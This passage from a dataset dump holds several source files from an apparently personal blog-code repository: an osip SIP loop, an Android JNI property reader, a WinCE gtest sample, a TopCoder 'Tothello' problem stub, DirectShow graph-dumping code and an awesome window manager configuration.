_TCHAR* argv[])\n{\n\tUNUSED(argc); UNUSED(argv);\n\tosip_t* osip = NULL;\n\tosip_init(&osip);\n\tSetCallbacks(osip);\n\tosip_thread_create(0, TransportFun, osip);\n\twhile(true)\n\t{\t\t\n\t\tosip_ict_execute(osip);\n\t\tosip_ist_execute(osip);\n\t\tosip_nict_execute(osip);\n\t\tosip_nist_execute(osip);\n\t\tosip_timers_ict_execute(osip);\n\t\tosip_timers_ist_execute(osip);\n\t\tosip_timers_nict_execute(osip);\n\t\tosip_timers_nist_execute(osip);\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.6332319974899292, "alphanum_fraction": 0.6514691114425659, "avg_line_length": 28.02941131591797, "blob_id": "45a28650acaea6a6a0476211c8f40ab935559f7b", "content_id": "91616bf70737b569efb8dd28c0bbf17a97bccc5f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 987, "license_type": "permissive", "max_line_length": 112, "num_lines": 34, "path": "/android/read_system_property_with_jni/jni/sys_property.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/**\n * Copyright (C) 2013 read_property\n *\n * @author Raymond Wen, [email protected]\n * @date 2013 Jul 21 15:00:58\n * \n */\n\n\n#include\t<jni.h>\n#include\t<android/log.h>\n#include\t<sys/system_properties.h>\n#include <stdlib.h>\n\n#define LOG_TAG \"libtupnp\"\n#define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)\n#define LOGE(...) __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)\n\njstring Java_com_rmd_propertySample_MainActivity_getProperty(JNIEnv* env, jobject thiz, jstring property_name) {\n char value[PROP_VALUE_MAX];\n /*const char* name = \"net.dns1\";*/\n const char* name = (*env)->GetStringUTFChars(env, property_name, NULL);\n\n __system_property_get(name, value);\n LOGI(\"__system_property_get: %s: %s\", name, value);\n return (*env)->NewStringUTF(env, value);\n /*return 0;*/\n}\n\nvoid Java_com_rmd_propertySample_MainActivity_setProperty(JNIEnv* env, \n jobject thiz, \n jstring property_name,\n jstring property_value) {\n}\n" }, { "alpha_fraction": 0.6272727251052856, "alphanum_fraction": 0.6454545259475708, "avg_line_length": 17.909090042114258, "blob_id": "7df390bc288428b3903e3cf0e689e88a3a11db99", "content_id": "dff5593221dabab92b1c2724caba364fda77b61d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 440, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/wince/ce_gtest_proj/ce_gtest_proj.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// ce_gtest_proj.cpp : Defines the entry point for the console application.\r\n//\r\n\r\n#include \"stdafx.h\"\r\n#include \"gtest/gtest.h\"\r\n#pragma comment(linker, \"/nodefaultlib:secchk.lib\")\r\nint add(int a, int b)\r\n{\r\n\treturn a+b;\r\n}\r\n\r\nTEST(AddTest, TestNonNegativeNumber)\r\n{\r\n\tEXPECT_EQ(1, add(1,0));\r\n\tEXPECT_EQ(42, add(1,41));\r\n}\r\n\r\nint _tmain(int argc, _TCHAR* argv[])\r\n{\r\n\ttesting::InitGoogleTest(&argc, argv);\r\n\treturn RUN_ALL_TESTS();\r\n}\r\n\r\n" }, { "alpha_fraction": 0.5405552983283997, "alphanum_fraction": 0.5547804832458496, "avg_line_length": 39.84357452392578, "blob_id": "b29cbf2cb56d7201d70356c71a1816277eafee5d", "content_id": "c23af1c43296d235ddbfbd91c80090235f445c26", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7319, "license_type": "permissive", "max_line_length": 92, "num_lines": 179, "path": "/algorithm/topcoder/practice_room/inv_2001_a+b/500.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: 500.cpp\n// \n// Description: problem Statement\n//     \n// THIS PROBLEM WAS TAKEN FROM THE SEMIFINALS OF THE TOPCODER INVITATIONAL\n// TOURNAMENT\n//\n// Class Name: Tothello\n// Method Name: bestMove\n// Parameters: String[], String[], String\n// Returns: int\n// Method signature (be sure your method is public): int bestMove(String[]\n// redPieces, String[] blackPieces, String whoseTurn);\n//\n//\n// PROBLEM STATEMENT\n// The game Tothello is a TopCoder modified version of the board game Othello.\n// The game is played on an 8 x 8 grid with two players, Black and Red. The\n// players alternate turns placing one piece representing their color in one empty\n// square of the grid. When the Red player puts a red piece down, any black\n// pieces that end up between the piece that was placed on the board and any other\n// red piece already on the board should be changed to red. If the change in\n// color from black to red of any piece on the board causes other black pieces to\n// lie between two red pieces, those black pieces should also be changed to red.\n// The changing of black pieces will continue until no one black piece lies\n// between two red pieces. The manner that pieces change color apply when the\n// Black player places a piece on the grid, however, the pieces would then change\n// from red to black. A player also has the option of passing - not putting any\n// pieces down - on his turn, in which case the other player just gets to go twice\n// in a row.\n//\n// You are to write a program that helps a player determine their best possible\n// move - the move that results in the most pieces being that player's color at\n// the end of the move. \n//\n// Implement a class Tothello that contains a method bestMove. bestMove inputs\n// the current state of the grid before a specified player's move and outputs the\n// number of the player's pieces on the board as a result of the player's best\n// move. \n//\n// NOTES\n// - redPieces is a String[] representing the current positions of red pieces on\n// the board. \n// - blackPieces is a String[] representing the current positions of black pieces\n// on the board. \n// - The board is an 8x8 grid with the columns referred to by the uppercase\n// letters A-H and the rows referred to by the numbers 1-8 (inclusive). The\n// column is specified before the row. A1 is in the upper left. H8 is in the\n// lower right. \n// - redPieces and blackPieces are not necessarily the same length (players may\n// have passed on moves).\n// - A black piece is between two red pieces if a red piece can be found before an\n// empty square on either side by following the horizontal, vertical, or either\n// diagonal out from the Black piece. For example:\n//\n// - - - R - - - -\n// - - - B - - - -\n// - - - B - - - - All three Black pieces are between two red pieces.\n// - - - B - - - -\n// - - - R - - - -\n//\n//\n// - - - R - - - -\n// - - - B B - - -\n// - - - B - B - - All four Black pieces are between two Red pieces.\n// - - - R R R R R\n//\n//\n// - - - R - - - -\n// - - - B R - - -\n// - - - - - - - - The Black piece is not between two Red pieces.\n// - - - R R - - -\n//\n//\n// R R R R R R R R\n// R - - - - - - R\n// R - B B - B - R\n// R - B B B B - R None of the Black pieces are between two Red pieces.\n// R - - - - - - R\n// R R R R R R R R\n//\n// TopCoder will ensure the validity of the inputs. Inputs are valid if all of\n// the following criteria are met:\n// - Both redPieces and blackPieces contain between 0 and 50 elements (inclusive).\n// - All elements of redPieces and blackPieces consist of uppercase letters A-H\n// and numbers 1-8 (inclusive).\n// - All elements of redPieces and blackPieces are in the form of letter-number\n// pairs with each letter representing the column and each number representing the\n// row of the piece's position (i.e. \"A2\" where 'A' is the column and '2' is the\n// row of the piece's position).\n// - whoseTurn is a String that is equal to either \"Red\" or \"Black\" representing\n// the player for which the method is being run.\n// - The current state of the board represented by redPieces and blackPieces\n// contains no red pieces between any black pieces and no black pieces between any\n// red pieces (a state where there were black pieces between red pieces is\n// impossible at the start of a move, assuming the game has been played\n// correctly.) \n// - The elements are unique in redPieces and blackPieces, and redPieces and\n// blackPieces do not contain any of the same elements.\n// - The game board must start with at least one unoccupied space.\n//\n// EXAMPLES\n// If redPieces=[C2,C3,C4,C5,D4,E4,F2,F3,F4,F5,G6] and\n// blackPieces=[B1,E1,G1,C6,H7,G4] and whoseTurn=\"Black\", \n// Before the player's move, the board is:\n//\n// A B C D E F G H\n// 1 - B - - B - B -\n// 2 - - R - - R - -\n// 3 - - R - - R - -\n// 4 - - R R R R B - \n// 5 - - R - - R - -\n// 6 - - B - - - R - \n// 7 - - - - - - - B\n// 8 - - - - - - - -\n//\n// Black's best move is C1, which results in:\n//\n// A B C D E F G H A B C D E F G H A B C D E F G H A B C D E F G H\n// 1 - B - - B - B - 1 - B B - B - B - 1 - B B - B - B - 1 - B B - B - B - \n// 2 - - R - - R - - 2 - - B - - R - - 2 - - B - - R - - 2 - - B - - R - -\n// 3 - - R - - R - - 3 - - B - - R - - 3 - - B - - R - - 3 - - B - - R - -\n// 4 - - R R R R B - --> 4 - - B R R R B - --> 4 - - B B B B B - --> 4 - - B B B B B -\n// 5 - - R - - R - - 5 - - B - - R - - 5 - - B - - R - - 5 - - B - - B - -\n// 6 - - B - - - R - 6 - - B - - - R - 6 - - B - - - R - 6 - - B - - - B -\n// 7 - - - - - - - B 7 - - - - - - - B 7 - - - - - - - B 7 - - - - - - - B\n// 8 - - - - - - - - 8 - - - - - - - - 8 - - - - - - - - 8 - - - - - - - -\n//\n// There end up being 16 black pieces, so the method should return 16.\n//\n// If redPieces=[A1,B8,C6,C8,D8] and blackPieces=[B2,C2,C3,C4,C5] and\n// whoseTurn=\"Red\", Red's best move is C1, and the method should return 11.\n//\n//\n//\n// Definition\n//     \n// Class:\n// Tothello\n// Method:\n// bestMove\n// Parameters:\n// vector <string>, vector <string>, string\n// Returns:\n// int\n// Method signature:\n// int bestMove(vector <string> param0, vector <string> param1, string param2)\n// (be sure your method is public)\n// \n// \n// =====================================================================================\n\n\n#include\t<string>\n#include\t<vector>\n\nusing std::string;\nusing std::vector;\n\nclass Tothello\n{\npublic:\n int bestMove(vector <string> param0, vector <string> param1, string param2);\nprivate:\n// int \n};\n\nint Tothello::bestMove(vector <string> param0, vector <string> param1, string param2)\n{\n return 0;\n}\n\n\nint main ( int argc, char *argv[] )\n{\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.7116564512252808, "alphanum_fraction": 0.7300613522529602, "avg_line_length": 30.200000762939453, "blob_id": "c62405c9c3faadfb0a8098d1c6d462d744b08a40", "content_id": "7dce8c81f108a858e789a4334adf61754373cb15", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 163, "license_type": "permissive", "max_line_length": 43, "num_lines": 5, "path": "/algorithm/i2a_ex_9.3-8/makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "EXENAME = ex9_3_8 \r\n#UNITTESTEXENAME = entry_source_name\r\n#SRCEXTENSION = cpp \r\n#EXTERNALLIBS += additional_libs_to_include\r\ninclude\t$(MAKEFILE_ROOT)\\common.mk\r\n\r\n" }, { "alpha_fraction": 0.7489177584648132, "alphanum_fraction": 0.7878788113594055, "avg_line_length": 45.20000076293945, "blob_id": "8141018a6f293940a32df375bbbf5dfa83f93917", "content_id": "c8f69461e2e9d437e58b5459c4d29070ba5de121", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 231, "license_type": "permissive", "max_line_length": 59, "num_lines": 5, "path": "/settings/go_tools.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "1. install vim-go plugin\n2. install go utils with GoInstallBinaries\n3. install glide with: go get github.com/Masterminds/glide\n 3.1. set GO15VENDOREXPRIMENT=1 to enable vendor support\n4. # install delve, alternative for godebug\n" }, { "alpha_fraction": 0.603985071182251, "alphanum_fraction": 0.6158156991004944, "avg_line_length": 23.09375, "blob_id": "28ed42505b289bceca9022456a2b4fafb979938d", "content_id": "4bfa6cd987cd582308ae07b313bb1c6a1697f8b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1606, "license_type": "permissive", "max_line_length": 67, "num_lines": 64, "path": "/multimedia/directshow/graphdump.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#include <dshow.h>\r\n\r\nvoid DumpGraph(const IGraphBuilder *pGraph)\r\n{\r\n\tusing std::cout;\r\n\tusing std::endl;\r\n\tIBaseFilter *pFlt = NULL;\r\n\tIEnumFilters *pEnumFlt = NULL;\r\n\tFILTER_INFO fltInfo;\r\n\r\n\tIEnumPins *pEnumPin = NULL;\r\n\tIPin *pPin = NULL;\r\n\tPIN_INFO pinInfo;\r\n\tHRESULT hr, hr2;\r\n\tTCHAR ptr[32] = {0};\r\n\thr = const_cast<IGraphBuilder*>(pGraph)->EnumFilters(&pEnumFlt);\r\n\tif(FAILED(hr))\r\n\t\treturn;\r\n\tdo\r\n\t{\r\n\t\thr = pEnumFlt->Next(1, &pFlt, NULL);\r\n\t\tif(S_OK != hr || NULL == pFlt)\r\n\t\t\tbreak;\r\n\r\n\t\tpFlt->QueryFilterInfo(&fltInfo);\r\n\t\tOutputDebugString(TEXT(\"\\t\"));\r\n\t\twsprintf(ptr, TEXT(\"0x%08X \"), pFlt);\r\n\t\tOutputDebugString(ptr);\r\n\t\tOutputDebugString(fltInfo.achName);\r\n\t\tOutputDebugString(TEXT(\"\\n\"));\r\n\t\tcout << fltInfo.achName << endl;\r\n\t\t\r\n\t\thr2 = pFlt->EnumPins(&pEnumPin);\r\n\t\tdo\r\n\t\t{\r\n\t\t\thr2 = pEnumPin->Next(1, &pPin, NULL);\r\n\t\t\tif(S_OK != hr2 || NULL == pPin)\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tpPin->QueryPinInfo(&pinInfo);\r\n\t\t\tOutputDebugString(TEXT(\"\\t\\t\"));\r\n\t\t\twsprintf(ptr, TEXT(\"0x%08X \"), pPin);\r\n\t\t\tOutputDebugString(ptr);\r\n\t\t\tif(PINDIR_INPUT == pinInfo.dir)\r\n\t\t\t\tOutputDebugString(TEXT(\"[In ]\\t\"));\r\n\t\t\telse\r\n\t\t\t\tOutputDebugString(TEXT(\"[Out]\\t\"));\r\n\t\t\tOutputDebugString(pinInfo.achName);\r\n\t\t\tIPin *pConnected = NULL;\r\n\t\t\tif(S_OK == pPin->ConnectedTo(&pConnected) && NULL != pConnected)\r\n\t\t\t\twsprintf(ptr, TEXT(\"\\t\\tConnected to:0x%08X\\n\"), pConnected);\r\n\t\t\telse\r\n\t\t\t\twsprintf(ptr, TEXT(\"\\t\\tNot Connected\\n\"));\r\n\t\t\tOutputDebugString(ptr);\r\n\r\n\t\t\tpPin->Release();\r\n\t\t} while(S_OK == hr2);\r\n\t\tpEnumPin->Release();\r\n\r\n\t\tpFlt->Release();\r\n\t\tpFlt = NULL;\r\n\t} while(S_OK == hr);\r\n\tpEnumFlt->Release();\r\n}\r\n" }, { "alpha_fraction": 0.5026484727859497, "alphanum_fraction": 0.5099433064460754, "avg_line_length": 39.83871078491211, "blob_id": "c3bbcda90934edd0f09955e3ba31c1034c80db4c", "content_id": "1d994566584bb3123106917ff4c0315ac51bf458", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 21532, "license_type": "permissive", "max_line_length": 165, "num_lines": 527, "path": "/settings/ubuntu_home/awesome/rc.lua", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "-- Standard awesome library\nrequire(\"awful\")\nrequire(\"awful.autofocus\")\nrequire(\"awful.rules\")\n-- Theme handling library\nrequire(\"beautiful\")\n-- Notification library\nrequire(\"naughty\")\n\n-- Load Debian menu entries\nrequire(\"debian.menu\")\n\n-- {{{ Error handling\n-- Check if awesome encountered an error during startup and fell back to\n-- another config (This code will only ever execute for the fallback config)\nif awesome.startup_errors then\n naughty.notify({ preset = naughty.config.presets.critical,\n title = \"Oops, there were errors during startup!\",\n text = awesome.startup_errors })\nend\n\n-- Handle runtime errors after startup\ndo\n local in_error = false\n awesome.add_signal(\"debug::error\", function (err)\n -- Make sure we don't go into an endless error loop\n if in_error then return end\n in_error = true\n\n naughty.notify({ preset = naughty.config.presets.critical,\n title = \"Oops, an error happened!\",\n text = err })\n in_error = false\n end)\nend\n-- }}}\n\n-- {{{ Variable definitions\n-- Themes define colours, icons, and wallpapers\nbeautiful.init(\"/usr/share/awesome/themes/zenburn/theme.lua\")\n\n-- This is used later as the default terminal and editor to run.\nterminal = \"x-terminal-emulator\"\neditor = os.getenv(\"EDITOR\") or \"editor\"\neditor_cmd = terminal .. \" -e \" .. editor\n\n-- Default modkey.\n-- Usually, Mod4 is the key with a logo between Control and Alt.\n-- If you do not like this or do not have such a key,\n-- I suggest you to remap Mod4 to another key using xmodmap or other tools.\n-- However, you can use another modifier like Mod1, but it may interact with others.\nmodkey = \"Mod4\"\n\n-- Table of layouts to cover with awful.layout.inc, order matters.\nlayouts =\n{\n awful.layout.suit.tile,\n awful.layout.suit.tile.left,\n awful.layout.suit.tile.bottom,\n awful.layout.suit.tile.top,\n awful.layout.suit.fair,\n awful.layout.suit.fair.horizontal,\n awful.layout.suit.spiral,\n awful.layout.suit.spiral.dwindle,\n awful.layout.suit.max,\n awful.layout.suit.max.fullscreen,\n awful.layout.suit.floating,\n awful.layout.suit.magnifier\n}\n-- }}}\n\n-- {{{ Tags\n-- Define a tag table which hold all screen tags.\ntags = {}\nfor s = 1, screen.count() do\n -- Each screen has its own tag table.\n tags[s] = awful.tag({ 1, 2, 3, 4, 5, 6, 7, 8, 9 }, s, layouts[1])\nend\n-- }}}\n\n-- {{{ Menu\n-- Create a laucher widget and a main menu\nmyawesomemenu = {\n { \"manual\", terminal .. \" -e man awesome\" },\n { \"edit config\", editor_cmd .. \" \" .. awesome.conffile },\n { \"restart\", awesome.restart },\n { \"quit\", awesome.quit }\n}\n\nmymainmenu = awful.menu({ items = { { \"awesome\", myawesomemenu, beautiful.awesome_icon },\n { \"Debian\", debian.menu.Debian_menu.Debian },\n { \"open terminal\", terminal }\n }\n })\n\nmylauncher = awful.widget.launcher({ image = image(beautiful.awesome_icon),\n menu = mymainmenu })\n-- }}}\n\n-- {{{ Wibox\n-- Create a textclock widget\nmytextclock = awful.widget.textclock({ align = \"right\" })\nbatterywidget = widget({type=\"textbox\", name=\"batterywidget\", align=\"right\"})\n-- Create a systray\nmysystray = widget({ type = \"systray\" })\n\n-- Create a wibox for each screen and add it\nmywibox = {}\nmypromptbox = {}\nmylayoutbox = {}\nmytaglist = {}\nmytaglist.buttons = awful.util.table.join(\n awful.button({ }, 1, awful.tag.viewonly),\n awful.button({ modkey }, 1, awful.client.movetotag),\n awful.button({ }, 3, awful.tag.viewtoggle),\n awful.button({ modkey }, 3, awful.client.toggletag),\n awful.button({ }, 4, awful.tag.viewnext),\n awful.button({ }, 5, awful.tag.viewprev)\n )\nmytasklist = {}\nmytasklist.buttons = awful.util.table.join(\n awful.button({ }, 1, function (c)\n if c == client.focus then\n c.minimized = true\n else\n if not c:isvisible() then\n awful.tag.viewonly(c:tags()[1])\n end\n -- This will also un-minimize\n -- the client, if needed\n client.focus = c\n c:raise()\n end\n end),\n awful.button({ }, 3, function ()\n if instance then\n instance:hide()\n instance = nil\n else\n instance = awful.menu.clients({ width=250 })\n end\n end),\n awful.button({ }, 4, function ()\n awful.client.focus.byidx(1)\n if client.focus then client.focus:raise() end\n end),\n awful.button({ }, 5, function ()\n awful.client.focus.byidx(-1)\n if client.focus then client.focus:raise() end\n end))\n\nfor s = 1, screen.count() do\n -- Create a promptbox for each screen\n mypromptbox[s] = awful.widget.prompt({ layout = awful.widget.layout.horizontal.leftright })\n -- Create an imagebox widget which will contains an icon indicating which layout we're using.\n -- We need one layoutbox per screen.\n mylayoutbox[s] = awful.widget.layoutbox(s)\n mylayoutbox[s]:buttons(awful.util.table.join(\n awful.button({ }, 1, function () awful.layout.inc(layouts, 1) end),\n awful.button({ }, 3, function () awful.layout.inc(layouts, -1) end),\n awful.button({ }, 4, function () awful.layout.inc(layouts, 1) end),\n awful.button({ }, 5, function () awful.layout.inc(layouts, -1) end)))\n -- Create a taglist widget\n mytaglist[s] = awful.widget.taglist(s, awful.widget.taglist.label.all, mytaglist.buttons)\n\n -- Create a tasklist widget\n mytasklist[s] = awful.widget.tasklist(function(c)\n return awful.widget.tasklist.label.currenttags(c, s)\n end, mytasklist.buttons)\n\n -- Create the wibox\n mywibox[s] = awful.wibox({ position = \"top\", screen = s })\n -- Add widgets to the wibox - order matters\n mywibox[s].widgets = {\n {\n mylauncher,\n mytaglist[s],\n mypromptbox[s],\n layout = awful.widget.layout.horizontal.leftright\n },\n mylayoutbox[s],\n batterywidget,\n mytextclock,\n s == 1 and mysystray or nil,\n mytasklist[s],\n layout = awful.widget.layout.horizontal.rightleft\n }\nend\n-- }}}\n\n-- {{{ Mouse bindings\nroot.buttons(awful.util.table.join(\n awful.button({ }, 3, function () mymainmenu:toggle() end),\n awful.button({ }, 4, awful.tag.viewnext),\n awful.button({ }, 5, awful.tag.viewprev)\n))\n-- }}}\n\n-- {{{ Key bindings\nglobalkeys = awful.util.table.join(\n awful.key({ modkey, }, \"Left\", awful.tag.viewprev ),\n awful.key({ modkey, }, \"Right\", awful.tag.viewnext ),\n awful.key({ modkey, }, \"Escape\", awful.tag.history.restore),\n\n awful.key({ modkey, }, \"j\",\n function ()\n awful.client.focus.byidx( 1)\n if client.focus then client.focus:raise() end\n end),\n awful.key({ modkey, }, \"k\",\n function ()\n awful.client.focus.byidx(-1)\n if client.focus then client.focus:raise() end\n end),\n awful.key({ modkey, }, \"w\", function () mymainmenu:show({keygrabber=true}) end),\n\n -- Layout manipulation\n awful.key({ modkey, \"Shift\" }, \"j\", function () awful.client.swap.byidx( 1) end),\n awful.key({ modkey, \"Shift\" }, \"k\", function () awful.client.swap.byidx( -1) end),\n awful.key({ modkey, \"Control\" }, \"j\", function () awful.screen.focus_relative( 1) end),\n awful.key({ modkey, \"Control\" }, \"k\", function () awful.screen.focus_relative(-1) end),\n awful.key({ modkey, }, \"u\", awful.client.urgent.jumpto),\n awful.key({ modkey, }, \"Tab\",\n function ()\n awful.client.focus.history.previous()\n if client.focus then\n client.focus:raise()\n end\n end),\n\n -- Standard program\n awful.key({ modkey, }, \"Return\", function () awful.util.spawn(terminal) end),\n awful.key({ modkey, \"Control\" }, \"r\", awesome.restart),\n awful.key({ modkey, \"Shift\" }, \"q\", awesome.quit),\n\n awful.key({ modkey, }, \"l\", function () awful.tag.incmwfact( 0.05) end),\n awful.key({ modkey, }, \"h\", function () awful.tag.incmwfact(-0.05) end),\n awful.key({ modkey, \"Shift\" }, \"h\", function () awful.tag.incnmaster( 1) end),\n awful.key({ modkey, \"Shift\" }, \"l\", function () awful.tag.incnmaster(-1) end),\n awful.key({ modkey, \"Control\" }, \"h\", function () awful.tag.incncol( 1) end),\n awful.key({ modkey, \"Control\" }, \"l\", function () awful.tag.incncol(-1) end),\n awful.key({ modkey, }, \"space\", function () awful.layout.inc(layouts, 1) end),\n awful.key({ modkey, \"Shift\" }, \"space\", function () awful.layout.inc(layouts, -1) end),\n\n awful.key({ modkey, \"Control\" }, \"n\", awful.client.restore),\n\n -- Prompt\n -- awful.key({ modkey }, \"r\", function () mypromptbox[mouse.screen]:run() end),\n\n awful.key({ modkey }, \"x\",\n function ()\n awful.prompt.run({ prompt = \"Run Lua code: \" },\n mypromptbox[mouse.screen].widget,\n awful.util.eval, nil,\n awful.util.getdir(\"cache\") .. \"/history_eval\")\n end),\n\n -- my own key bindings\n awful.key({ \"Mod1\", \"Control\" }, \"l\", function () awful.util.spawn('gnome-screensaver-command -l') end),\n -- use alt+tab to switch to last focus client\n awful.key({ \"Mod1\", }, \"Tab\",\n function ()\n if nil == previous_client then\n else\n c = previous_client\n --debug_message(# c:geometry())\n if not c.focusable then\n return\n end\n if pcall(c.tags, c) then -- use pcall to test if c:tags can be called\n t = c:tags()[# c:tags()] -- # operator gets the number of tags table, refer to http://lua-users.org/wiki/TablesTutorial\n awful.tag.viewonly(t)\n c:raise()\n c.minimized = false\n awful.client.focus.byidx(0, c)\n if current_screen == nil or current_screen ~= c.screen then\n awful.screen.focus(c.screen)\n current_screen = c.screen\n end\n else\n previous_client = nil\n end\n end\n end),\n\n -- use ctrl+alt+c to run a caculator\n awful.key({ \"Mod1\", \"Control\" }, \"c\",\n function () \n awful.prompt.run({ prompt = \"<span color='yellow'><b> Calc: </b></span>\" }, mypromptbox[mouse.screen].widget,\n function (expr)\n local result = awful.util.pread(\"python -c 'from __future__ import division; from math import *; print \"..expr..\"'\")\n --naughty.notify({ text = result, timeout = 10 })\n naughty.notify({ title= expr..\"=\",\n text=result, \n position=\"top_left\", \n font=\"Sans 16\",\n border_color=\"black\", \n bg='#82B440', \n timeout=6,\n --hover_timeout=8,\n --run = function() io.popen(\"echo -n \"..result..\" | xclip -i\") end,\n })\n end)\n end),\n -- use Win+alt+r to run a program as root\n awful.key({ modkey, \"Mod1\" }, \"r\", \n function () \n path = os.getenv(\"PATH\"):gsub(':', ' ')\n cmd = awful.util.pread(\"stest -xelf \"..path..\" | dmenu \"\n ..\"-i -nf '#aaaaaa' -nb '#cc3244' -sf '#ffffff' -sb '#285577' -p 'run as root'\")\n if cmd and string.len(cmd)>0 then\n awful.util.spawn(\"gksu \"..cmd)\n end\n end),\n awful.key({ modkey }, \"r\", function () awful.util.spawn(\"dmenu_run \"\n ..\"-i -nf '#888888' -nb '#222222' -sf '#ffffff' -sb '#285577'\") end),\n awful.key({ \"Mod1\", \"Control\" }, \"s\",\n function ()\n local all_window = \"\\\"\"\n for k, c in pairs(client.get()) do\n if c.name then\n all_window = all_window .. \n string.gsub(c.name, '[\"]', '\\\\%1') .. \"\\n\" end\n end\n local lines = # client.get()\n local max_dmenu_lines = 18\n\n if lines > max_dmenu_lines then\n lines = max_dmenu_lines\n end\n all_window = all_window .. \"\\\"\"\n local f_reader = io.popen( \"printf \"..all_window..\"| dmenu -l \"..lines..\" -i -nb '\".. beautiful.bg_normal ..\"' -nf '\".. beautiful.fg_normal ..\"' -sb '#955'\")\n -- local f_reader = io.popen( \"lsw | dmenu -i -nb '\".. beautiful.bg_normal ..\"' -nf '\".. beautiful.fg_normal ..\"' -sb '#955'\")\n local command = assert(f_reader:read('*a'))\n f_reader:close()\n if command == \"\" then return end\n\n -- Check throught the clients if the title match the desired title\n local desired_title=string.lower(command)\n if desired_title:sub(#desired_title) == '\\n' then\n desired_title = desired_title:sub(0, #desired_title-1)\n end\n for k, c in pairs(client.get()) do\n if c.name then\n local title=string.lower(c.name)\n if title == desired_title then\n for i, v in ipairs(c:tags()) do\n awful.tag.viewonly(v)\n c:raise()\n c.minimized = false\n awful.screen.focus(c.screen)\n awful.client.focus.byidx(0, c)\n return\n end\n end\n end\n end\n end)\n)\n\nclientkeys = awful.util.table.join(\n awful.key({ modkey, }, \"f\", function (c) c.fullscreen = not c.fullscreen end),\n awful.key({ modkey, \"Shift\" }, \"c\", function (c) c:kill() end),\n awful.key({ modkey, \"Control\" }, \"space\", awful.client.floating.toggle ),\n awful.key({ modkey, \"Control\" }, \"Return\", function (c) c:swap(awful.client.getmaster()) end),\n awful.key({ modkey, }, \"o\", awful.client.movetoscreen ),\n awful.key({ modkey, \"Shift\" }, \"r\", function (c) c:redraw() end),\n awful.key({ modkey, }, \"t\", function (c) c.ontop = not c.ontop end),\n awful.key({ modkey, }, \"n\",\n function (c)\n -- The client currently has the input focus, so it cannot be\n -- minimized, since minimized clients can't have the focus.\n c.minimized = true\n end),\n awful.key({ modkey, }, \"m\",\n function (c)\n c.maximized_horizontal = not c.maximized_horizontal\n c.maximized_vertical = not c.maximized_vertical\n end),\n\n -- my own key bindings for client\n awful.key({ \"Mod1\" }, \"F4\", function (c) c:kill() end)\n)\n\n-- Compute the maximum number of digit we need, limited to 9\nkeynumber = 0\nfor s = 1, screen.count() do\n keynumber = math.min(9, math.max(#tags[s], keynumber));\nend\n\n-- Bind all key numbers to tags.\n-- Be careful: we use keycodes to make it works on any keyboard layout.\n-- This should map on the top row of your keyboard, usually 1 to 9.\nfor i = 1, keynumber do\n globalkeys = awful.util.table.join(globalkeys,\n awful.key({ modkey }, \"#\" .. i + 9,\n function ()\n local screen = mouse.screen\n if tags[screen][i] then\n awful.tag.viewonly(tags[screen][i])\n end\n end),\n awful.key({ modkey, \"Control\" }, \"#\" .. i + 9,\n function ()\n local screen = mouse.screen\n if tags[screen][i] then\n awful.tag.viewtoggle(tags[screen][i])\n end\n end),\n awful.key({ modkey, \"Shift\" }, \"#\" .. i + 9,\n function ()\n if client.focus and tags[client.focus.screen][i] then\n awful.client.movetotag(tags[client.focus.screen][i])\n end\n end),\n awful.key({ modkey, \"Control\", \"Shift\" }, \"#\" .. i + 9,\n function ()\n if client.focus and tags[client.focus.screen][i] then\n awful.client.toggletag(tags[client.focus.screen][i])\n end\n end))\nend\n\nclientbuttons = awful.util.table.join(\n awful.button({ }, 1, function (c) client.focus = c; c:raise() end),\n awful.button({ modkey }, 1, awful.mouse.client.move),\n awful.button({ modkey }, 3, awful.mouse.client.resize))\n\n-- Set keys\nroot.keys(globalkeys)\n-- }}}\n\n-- {{{ Rules\nawful.rules.rules = {\n -- All clients will match this rule.\n { rule = { },\n properties = { border_width = beautiful.border_width,\n border_color = beautiful.border_normal,\n focus = true,\n keys = clientkeys,\n buttons = clientbuttons } },\n { rule = { class = \"MPlayer\" },\n properties = { floating = true } },\n { rule = { class = \"pinentry\" },\n properties = { floating = true } },\n { rule = { class = \"gimp\" },\n properties = { floating = true } },\n -- Set Firefox to always map on tags number 2 of screen 1.\n -- { rule = { class = \"Firefox\" },\n -- properties = { tag = tags[1][2] } },\n}\n-- }}}\n\n-- {{{ Signals\n-- Signal function to execute when a new client appears.\nclient.add_signal(\"manage\", function (c, startup)\n -- Add a titlebar\n -- awful.titlebar.add(c, { modkey = modkey })\n\n-- -- Enable sloppy focus\n-- c:add_signal(\"mouse::enter\", function(c)\n-- if awful.layout.get(c.screen) ~= awful.layout.suit.magnifier\n-- and awful.client.focus.filter(c) then\n-- client.focus = c\n-- end\n-- end)\n\n if not startup then\n -- Set the windows at the slave,\n -- i.e. put it at the end of others instead of setting it master.\n -- awful.client.setslave(c)\n\n -- Put windows in a smart way, only if they does not set an initial position.\n if not c.size_hints.user_position and not 